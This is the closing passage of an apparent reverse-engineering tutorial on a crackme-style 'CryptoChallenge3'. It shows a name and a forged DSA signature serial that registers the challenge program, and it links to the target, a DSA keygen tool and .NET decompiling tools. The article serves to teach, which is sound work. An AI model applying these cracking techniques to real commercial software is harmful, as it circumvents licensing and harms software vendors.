in the patched challenge with what we’ve got: Name: Jamal Chahir Serial: R-S = 5DD88D3FE73B83F8027BB0AD3A53D404F887840B-E189F0BAC17C03EDA24FD5FD837FA397D6501321 The above picture shows that we have successfully registered the application. That’s it. 5. Conclusion The whole idea behind this article was to show you that the key size is no problem once you completely understand the algorithm. But there still plenty of ways to manage that problem, depending on how the programmer thinks. Download links: Target: https://www.dropbox.com/s/u7ywze2gsmweskk/CryptoChallenge3.rar?dl=0 DSAK: https://www.dropbox.com/s/b7lveh2lc8fukcs/DSAK.rar?dl=0 PEiD : PEiD Download - Softpedia .NET Reflector: .NET decompiler: decompile any .NET code | .NET Reflector Reflexil: reflexil.net Sources: http://en.wikipedia.org/wiki/Digital_Signature_Algorithm Source